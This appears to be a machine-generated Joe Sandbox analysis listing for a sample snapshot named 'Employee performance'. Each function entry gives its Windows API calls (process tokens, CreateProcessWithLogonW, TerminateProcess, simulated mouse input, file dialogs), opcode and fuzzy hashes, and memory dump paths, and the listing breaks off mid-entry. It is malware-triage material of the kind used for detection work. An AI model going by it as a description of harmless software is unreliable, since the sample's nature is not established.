Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 127644f6a5c5967a9f5abdf2551532497c7509b04dc410df9b1a3ecbea9c75e7
Instruction ID: 5069ca4d37dda5d075f4a7ee905dfac34f16be41df8998abe0669ea1489bd471
Opcode Fuzzy Hash: 127644f6a5c5967a9f5abdf2551532497c7509b04dc410df9b1a3ecbea9c75e7
Instruction Fuzzy Hash: 5581B330208241AFD754EF24C895E2BBBE6FF84308F18459DF5954B2A2DB35ED05DB92

Function 0102F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0102F7B9
SysAllocString.OLEAUT32(00000001), ref: 0102F860
VariantCopy.OLEAUT32(0102FA64,00000000), ref: 0102F889
VariantClear.OLEAUT32(0102FA64), ref: 0102F8AD
VariantCopy.OLEAUT32(0102FA64,00000000), ref: 0102F8B1
VariantClear.OLEAUT32(?), ref: 0102F8BB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: ae1c487a908bb0b8a009745476093cc01336c1c797c923be02d6cfff9d557d03
Instruction ID: a4d9d89b52ec5642ae68895a76ff8ab95ee46fc4f47528a40885e237d80ba23b
Opcode Fuzzy Hash: ae1c487a908bb0b8a009745476093cc01336c1c797c923be02d6cfff9d557d03
Instruction Fuzzy Hash: 7851E331600322BADF20AF65D884B6DB3F9EF45350F24845BE986DF295DBB49C40CB96

Function 0104910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00FD7620: _wcslen.LIBCMT ref: 00FD7625

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 010494E5
_wcslen.LIBCMT ref: 01049506
_wcslen.LIBCMT ref: 0104952D
GetSaveFileNameW.COMDLG32(00000058), ref: 01049585

Strings

X, xrefs: 01049412

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 2e1574c526654700d996ee06b95bfe40632881b12629ac1edaae6c4ad22374d1
Instruction ID: 42465ca81f31589b0cf966817e7466fd51700674d7dce6c092d2df69ae5c90e9
Opcode Fuzzy Hash: 2e1574c526654700d996ee06b95bfe40632881b12629ac1edaae6c4ad22374d1
Instruction Fuzzy Hash: 59E180716083418FD724DF24C881A6AB7E5BF89314F18857DF9899B3A2DB35ED04CB92

Function 00FE920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

BeginPaint.USER32(?,?,?), ref: 00FE9241
GetWindowRect.USER32(?,?), ref: 00FE92A5
ScreenToClient.USER32(?,?), ref: 00FE92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FE92D3
EndPaint.USER32(?,?,?,?,?), ref: 00FE9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 010271EA

Part of subcall function 00FE9339: BeginPath.GDI32(00000000), ref: 00FE9357

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: a86b0d2afc63f70f74122dcebd6a45e2fcaa2463dd5c3e273236913751886bbd
Instruction ID: 8bdb5b02df2c3b221a83173b7b870337f9abee4d4af85e26a70d13e67f4b1e3c
Opcode Fuzzy Hash: a86b0d2afc63f70f74122dcebd6a45e2fcaa2463dd5c3e273236913751886bbd
Instruction Fuzzy Hash: 2941B031108340AFD721DF29C884FAA7BE9EF59320F140269FAE4871E1C7769845EB62

Function 010407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0104080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 01040847
EnterCriticalSection.KERNEL32(?), ref: 01040863
LeaveCriticalSection.KERNEL32(?), ref: 010408DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 010408F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 01040921

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: a12cd67f97823ebd509f7607943960ed1cc40c6b25bdc629e31c3f51abae7d39
Instruction ID: 7ebaed5da5dffe4992cf38ba1de04780f5fa6b661751ada75dad63d6d51428ef
Opcode Fuzzy Hash: a12cd67f97823ebd509f7607943960ed1cc40c6b25bdc629e31c3f51abae7d39
Instruction Fuzzy Hash: FA418B71900205EBEF159F54DC81AAA77B9FF04300F1080B9EE40AA29ADB35EE54DBA0

Function 010681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0102F3AB,00000000,?,?,00000000,?,0102682C,00000004,00000000,00000000), ref: 0106824C
EnableWindow.USER32(00000000,00000000), ref: 01068272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 010682D1
ShowWindow.USER32(00000000,00000004), ref: 010682E5
EnableWindow.USER32(00000000,00000001), ref: 0106830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0106832F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 939b55ca83048ae0befaa9515c43db00b4441fe11bdd575178f162aa8b62ffb7
Instruction ID: 54e64c139bba0a142953740dc92a6add78b4eed3eb48e958ab5c07680367ec67
Opcode Fuzzy Hash: 939b55ca83048ae0befaa9515c43db00b4441fe11bdd575178f162aa8b62ffb7
Instruction Fuzzy Hash: 6441B634601745AFEB62CF19C989BE47FE4FB0A714F1881EAE6D84F262C336A441CB50

Function 010522DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 010522E8

Part of subcall function 0104E4EC: GetWindowRect.USER32(?,?), ref: 0104E504

GetDesktopWindow.USER32 ref: 01052312
GetWindowRect.USER32(00000000), ref: 01052319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 01052355
GetCursorPos.USER32(?), ref: 01052381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010523DF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 542bb78cffd5feabcf9aada93cdfc9aff8896332d0c6ee7281101e72126dc520
Instruction ID: fb712ea66b6ff7a061fb2e3469481fd9ea4cc56bafbdea92a209e2d1a8353333
Opcode Fuzzy Hash: 542bb78cffd5feabcf9aada93cdfc9aff8896332d0c6ee7281101e72126dc520
Instruction Fuzzy Hash: 6E31C072504305AFD760DF58C848B9BBBE9FF88314F004A1AF9C597191DB35EA08CB92

Function 01034C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 01034C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 01034CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 01034CEA
_wcslen.LIBCMT ref: 01034D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 01034D10
_wcsstr.LIBVCRUNTIME ref: 01034D1A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 8b6d22099aad71aec7b20ee94a7c66a027bc25f212e55920afc297318483d785
Instruction ID: fc479a51ffd4a766ff670bf78b32f8ef197dc03479a174e6cf9ebbb90817b806
Opcode Fuzzy Hash: 8b6d22099aad71aec7b20ee94a7c66a027bc25f212e55920afc297318483d785
Instruction Fuzzy Hash: F52129316042047BFB656B3AAC49E7F7BDCDF89750F008069F845CE192DAB5DC0097A0

Function 0104581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD3A97,?,?,00FD2E7F,?,?,?,00000000), ref: 00FD3AC2

_wcslen.LIBCMT ref: 0104587B
CoInitialize.OLE32(00000000), ref: 01045995
CoCreateInstance.OLE32(0106FCF8,00000000,00000001,0106FB68,?), ref: 010459AE
CoUninitialize.OLE32 ref: 010459CC

Strings

.lnk, xrefs: 01045876, 010458C1, 01045985

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: ff8d6d51fd2cdf5023cbf429a1e52b7a3de96c9b9dd12fde445c47ae2991367d
Instruction ID: ddfc788cf2ff8b5001fb792ebe2b5688c90250e6728dfbb9a3bab24246383dcf
Opcode Fuzzy Hash: ff8d6d51fd2cdf5023cbf429a1e52b7a3de96c9b9dd12fde445c47ae2991367d
Instruction Fuzzy Hash: 48D156B56083019FC714DF19C880A2ABBE6FF89710F1449ADF9899B361DB35EC45CB92

Function 0103175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01030FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01030FCA
Part of subcall function 01030FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01030FD6
Part of subcall function 01030FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01030FE5
Part of subcall function 01030FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01030FEC
Part of subcall function 01030FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01031002

GetLengthSid.ADVAPI32(?,00000000,01031335), ref: 010317AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 010317BA
HeapAlloc.KERNEL32(00000000), ref: 010317C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 010317DA
GetProcessHeap.KERNEL32(00000000,00000000,01031335), ref: 010317EE
HeapFree.KERNEL32(00000000), ref: 010317F5

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 80b8eae80b52a6c8674bd4fd3173df2fa50cc5790254e11ccd723589797f8b2e
Instruction ID: 558bc568c3ddf808af11b61e11b2dedbb70d8004c63ab96f5a7dcd02251b1634
Opcode Fuzzy Hash: 80b8eae80b52a6c8674bd4fd3173df2fa50cc5790254e11ccd723589797f8b2e
Instruction Fuzzy Hash: 6111AC31500205EFEB219FA8CD48BAE7BFDFB8A255F184098F5C197210C73AA944CB60

Function 010314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010314FF
OpenProcessToken.ADVAPI32(00000000), ref: 01031506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01031515
CloseHandle.KERNEL32(00000004), ref: 01031520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 01031563

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 13d023494e00224705a1685ab9a680c78ef5c1f76226a1bcfafeb414c2a6b1a1
Instruction ID: f3e68c806847c65b5716ce16324900978a80f54c7a13ffb0cfa153ca8e73e3e3
Opcode Fuzzy Hash: 13d023494e00224705a1685ab9a680c78ef5c1f76226a1bcfafeb414c2a6b1a1
Instruction Fuzzy Hash: 71112972500249EBEF218F98DE49BDE7BADFF49744F044055FA85A20A0C37A8E61DB60

Function 00FF3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00FF3379,00FF2FE5), ref: 00FF3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FF339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF33B7
SetLastError.KERNEL32(00000000,?,00FF3379,00FF2FE5), ref: 00FF3409

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 93ab0a6499906dcd8721f83fd9615e751c813c559de9aa87b4f8e0945a8a140b
Instruction ID: 9692ba7b59d1561f7dc7af28b5902b93cd4b8a4b4edde3b75feae4592cf539e4
Opcode Fuzzy Hash: 93ab0a6499906dcd8721f83fd9615e751c813c559de9aa87b4f8e0945a8a140b
Instruction Fuzzy Hash: 5D012433A083297EBA3566747D99A773A94EF463B9B200229F760802F4EF1B4E117244

Function 01002D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01005686,01013CD6,?,00000000,?,01005B6A,?,?,?,?,?,00FFE6D1,?,01098A48), ref: 01002D78
_free.LIBCMT ref: 01002DAB
_free.LIBCMT ref: 01002DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00FFE6D1,?,01098A48,00000010,00FD4F4A,?,?,00000000,01013CD6), ref: 01002DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00FFE6D1,?,01098A48,00000010,00FD4F4A,?,?,00000000,01013CD6), ref: 01002DEC
_abort.LIBCMT ref: 01002DF2

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 758fd33fee6873f0d0637088c5ebe3ade9c504c72020ef6783de64f499da9833
Instruction ID: ab43fa3fc45d84008193599a5e874e7cda03b1ca8a7636f5b9baa96acc868ffb
Opcode Fuzzy Hash: 758fd33fee6873f0d0637088c5ebe3ade9c504c72020ef6783de64f499da9833
Instruction Fuzzy Hash: 74F02832508A022BF6633238BC0CE9E2999BFD26A0F25041AF9E4D61D4EF298C018360

Function 01068A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE9693
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96A2
Part of subcall function 00FE9639: BeginPath.GDI32(?), ref: 00FE96B9
Part of subcall function 00FE9639: SelectObject.GDI32(?,00000000), ref: 00FE96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 01068A4E
LineTo.GDI32(?,00000003,00000000), ref: 01068A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 01068A70
LineTo.GDI32(?,00000000,00000003), ref: 01068A80
EndPath.GDI32(?), ref: 01068A90
StrokePath.GDI32(?), ref: 01068AA0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e2c2d96fb0feab8e0e358713395c2a26bcca0d28bc69b22b2dab7d9cc41f6b0e
Instruction ID: 3480b82e0694cb24b77229cd34e5b4cbea4706829f4cbea44fd5649c4430f7c8
Opcode Fuzzy Hash: e2c2d96fb0feab8e0e358713395c2a26bcca0d28bc69b22b2dab7d9cc41f6b0e
Instruction Fuzzy Hash: 5D110C76000108BFFF119F94DC48E9A7FACEB09350F008052FA9599164C7769D55DB60

Function 010351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 01035218
GetDeviceCaps.GDI32(00000000,00000058), ref: 01035229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01035230
ReleaseDC.USER32(00000000,00000000), ref: 01035238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0103524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 01035261

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: cd87afcb1a6d0b765d39cab5a63217742668fd722c4a774edd683a0a66a4d7a7
Instruction ID: 68249d87751a3c9c797a24c7ff949f1577691710a509bda62e2230c038e9af23
Opcode Fuzzy Hash: cd87afcb1a6d0b765d39cab5a63217742668fd722c4a774edd683a0a66a4d7a7
Instruction Fuzzy Hash: B601A275E00719BBFB109BE59D49E4EBFB8EF49351F044066FA85AB290D6719C00CFA0

Function 00FD1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD1C22

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d545b0fbb7c29e11de79f1be4b4f12215da61d8c3b6879725a5f97f67f062afe
Instruction ID: 559cefd6f6aa8e7e9fd627a210b00ced7d268c84d5319b4227cddb4e9296aa32
Opcode Fuzzy Hash: d545b0fbb7c29e11de79f1be4b4f12215da61d8c3b6879725a5f97f67f062afe
Instruction Fuzzy Hash: B60144B0902B5ABDE3008F6A8C85A52FEA8FF19354F00411BA15C4BA42C7B5A864CBE5

Function 0103EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0103EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0103EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103EB75

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
